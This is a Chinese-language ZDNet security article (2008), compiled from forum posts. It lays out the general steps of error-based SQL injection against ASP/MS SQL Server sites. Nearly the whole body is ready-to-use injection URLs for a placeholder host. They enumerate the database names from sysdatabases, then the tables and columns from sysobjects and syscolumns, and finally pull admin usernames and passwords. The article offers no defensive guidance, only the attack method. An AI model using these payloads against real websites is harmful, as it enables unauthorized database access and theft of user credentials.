科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道从暴库到暴密码的一般步骤

从暴库到暴密码的一般步骤

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

看了臭要饭写的跨库查询,我整理了一下从暴库到暴出密码等的一般 步骤,使得思路更清晰些。

作者:论坛整理 来源:zdnet网络安全 2008年1月11日

关键字: 攻击防范 入侵 暴库

  • 评论
  • 分享微博
  • 分享邮件
看了臭要饭写的跨库查询,我整理了一下从暴库到暴出密码等的一般 
步骤,使得思路更清晰些。 
SQL INJECTION 灵活多变,注入的语句不一,下面只提供暴库的一般 
步骤,希望能对你有帮助。 
1:暴出所有库名. 
http://www.xxx.com/xxx.asp?id=1 and 0<>(select count(*) 
from master.dbo.sysdatabases where name>1 and dbid=6) 
依次提交 dbid = 7,8,9.... 得到更多的数据库名 
2:暴出库中的表 
假设存在一个bbs的数据库,提交下面的语句: 
http://www.xxx.com/jump.asp?id=1 and 0<>(select top 1 name 
from bbs.dbo.sysobjects where xtype=’U’) 
来得到一个表 假设为 admin 
提交: 
http://www.xxx.com/jump.asp?id=1 and 0<>(select top 1 name 
from bbs.dbo.sysobjects where xtype=’U’ and name not in 
(’Admin’)) 
来得到其他的表。 
3:暴出表中的字段 
提交: 
http://www.xxx.com/xxx.asp?id=1 and 0<>(select count(*) 
from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’ 
and uid>(str(id))) 
得到UID的数值假设为18779569 uid=id 
提交: 
http://www.xxx.com/xxx.asp?id=1 and 0<>(select top 1 name 
from bbs.dbo.syscolumns where id=18779569) 
得到一个admin的一个字段,假设为 user_id 
提交: 
http://www.xxx.com/xxx.asp?id=1 and 0<>(select top 1 name 
from bbs.dbo.syscolumns where id=18779569 and name not in 
(’id’,...)) 
来暴出其他的字段 
4:暴出用户名和密码等 
假设存在user_id username ,password 等字段,提交: 
http://www.xxx.com/xxx.asp?id=1 and 0<(select user_id from 
BBS.dbo.admin where username>1) 
可以得到用户名 
依次可以得到密码。
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章